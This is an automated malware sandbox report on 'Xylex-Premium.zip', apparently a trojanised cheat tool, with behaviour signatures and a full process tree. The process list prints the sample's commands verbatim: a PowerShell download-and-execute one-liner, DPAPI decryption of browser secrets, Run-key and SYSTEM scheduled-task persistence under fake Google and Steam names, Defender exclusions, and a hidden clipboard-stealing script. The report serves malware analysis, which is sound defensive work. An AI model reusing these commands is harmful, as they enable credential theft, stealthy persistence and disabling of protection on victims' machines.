Analysis Overview
SHA256
bd8a66310436b855871114e5b70f7936e51a0afd2d8d5ab77a1a9ded69dc9c9f
Threat Level: Known bad
The file Xylex-Premium.zip was found to be: Known bad.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Reads user/profile data of web browsers
Loads dropped DLL
Executes dropped EXE
Looks up external IP address via web service
Adds Run key to start application
An obfuscated cmd.exe command-line is typically used to evade detection.
Launches sc.exe
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Enumerates processes with tasklist
Modifies registry key
Opens file in notepad (likely ransom note)
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Suspicious use of SendNotifyMessage
Detects videocard installed
Checks processor information in registry
Checks SCSI registry key(s)
Creates scheduled task(s)
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Modifies registry class
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-03 06:40
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-03 06:40
Reported
2024-06-03 06:51
Platform
win11-20240426-en
Max time kernel
678s
Max time network
679s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\curl.exe | N/A |
| N/A | N/A | C:\Windows\system32\curl.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\vsPkDgRTpOrbGuB.ps1\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Executor\\xylex.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\gJcMjZkbpUPtLad.ps1\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Executor\\xylex.exe" | C:\Windows\system32\reg.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\taskmgr.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Detects videocard installed
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings | C:\Windows\system32\taskmgr.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\System32\Notepad.exe | N/A |
| N/A | N/A | C:\Windows\System32\Notepad.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Executor\Xylex.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $down=New-Object System.Net.WebClient;$url='https://github.com/xylexV5/xylexz/releases/download/vypix/xylex.exe';$file='xylex.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe
"C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -noprofile -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sctyk5ct\sctyk5ct.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES566D.tmp" "c:\Users\Admin\AppData\Local\Temp\sctyk5ct\CSCD9AAD5F942E444D0BE4875BB10432BE9.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,238,156,48,203,153,40,183,74,155,57,209,91,118,45,98,188,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,240,132,237,149,45,67,26,224,155,156,8,181,224,96,78,151,154,46,202,101,249,97,141,165,239,101,32,47,174,213,144,44,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,5,118,4,252,204,118,149,111,47,84,90,247,149,190,34,249,18,252,47,179,62,225,47,93,195,23,120,101,61,101,30,235,48,0,0,0,144,60,90,153,163,30,104,172,123,39,168,11,95,160,138,71,243,107,144,2,50,45,70,124,4,172,47,165,61,165,64,105,236,53,38,158,175,136,209,149,37,63,179,220,166,88,37,85,64,0,0,0,118,167,221,170,254,48,117,31,150,36,196,116,199,187,171,38,184,48,64,53,110,62,94,141,234,254,235,232,6,73,237,45,142,243,225,206,25,5,10,78,242,193,201,184,107,245,34,156,238,170,149,227,218,151,82,101,219,166,72,147,198,231,15,120), $null, 'CurrentUser')"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,238,156,48,203,153,40,183,74,155,57,209,91,118,45,98,188,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,240,132,237,149,45,67,26,224,155,156,8,181,224,96,78,151,154,46,202,101,249,97,141,165,239,101,32,47,174,213,144,44,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,5,118,4,252,204,118,149,111,47,84,90,247,149,190,34,249,18,252,47,179,62,225,47,93,195,23,120,101,61,101,30,235,48,0,0,0,144,60,90,153,163,30,104,172,123,39,168,11,95,160,138,71,243,107,144,2,50,45,70,124,4,172,47,165,61,165,64,105,236,53,38,158,175,136,209,149,37,63,179,220,166,88,37,85,64,0,0,0,118,167,221,170,254,48,117,31,150,36,196,116,199,187,171,38,184,48,64,53,110,62,94,141,234,254,235,232,6,73,237,45,142,243,225,206,25,5,10,78,242,193,201,184,107,245,34,156,238,170,149,227,218,151,82,101,219,166,72,147,198,231,15,120), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,238,156,48,203,153,40,183,74,155,57,209,91,118,45,98,188,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,30,33,9,7,82,225,214,92,15,159,202,147,139,45,89,87,231,151,227,53,170,79,92,11,223,143,97,106,97,154,161,9,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,21,253,137,58,142,103,70,102,12,189,67,174,111,249,213,75,220,211,167,169,116,14,13,182,98,95,162,252,2,230,176,103,48,0,0,0,52,214,32,138,26,48,216,25,50,239,33,228,149,1,46,204,28,5,199,198,129,96,1,203,31,101,98,78,63,94,55,14,217,3,117,232,82,31,234,98,233,98,205,228,177,255,26,93,64,0,0,0,130,107,36,32,57,149,185,197,48,184,95,52,114,206,152,10,184,207,1,53,59,142,23,125,248,153,95,41,99,30,222,95,238,92,97,132,248,36,245,34,7,59,219,119,201,126,196,81,133,18,22,202,225,208,186,249,141,11,195,129,16,159,30,250), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,238,156,48,203,153,40,183,74,155,57,209,91,118,45,98,188,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,30,33,9,7,82,225,214,92,15,159,202,147,139,45,89,87,231,151,227,53,170,79,92,11,223,143,97,106,97,154,161,9,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,21,253,137,58,142,103,70,102,12,189,67,174,111,249,213,75,220,211,167,169,116,14,13,182,98,95,162,252,2,230,176,103,48,0,0,0,52,214,32,138,26,48,216,25,50,239,33,228,149,1,46,204,28,5,199,198,129,96,1,203,31,101,98,78,63,94,55,14,217,3,117,232,82,31,234,98,233,98,205,228,177,255,26,93,64,0,0,0,130,107,36,32,57,149,185,197,48,184,95,52,114,206,152,10,184,207,1,53,59,142,23,125,248,153,95,41,99,30,222,95,238,92,97,132,248,36,245,34,7,59,219,119,201,126,196,81,133,18,22,202,225,208,186,249,141,11,195,129,16,159,30,250), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get serialnumber
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\system32\schtasks.exe
schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\system32\cscript.exe
cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
C:\Windows\System32\Wbem\WMIC.exe
wmic baseboard get serialnumber
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rvdillkg\rvdillkg.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A64.tmp" "c:\Users\Admin\AppData\Local\Temp\rvdillkg\CSCFC39675825334B599630273D765063DF.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_computersystemproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Description,PNPDeviceID
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
C:\Windows\System32\Wbem\WMIC.exe
wmic memorychip get serialnumber
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get processorid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
C:\Windows\system32\getmac.exe
getmac /NH
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe" /f
C:\Windows\system32\reg.exe
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
C:\Windows\system32\curl.exe
curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
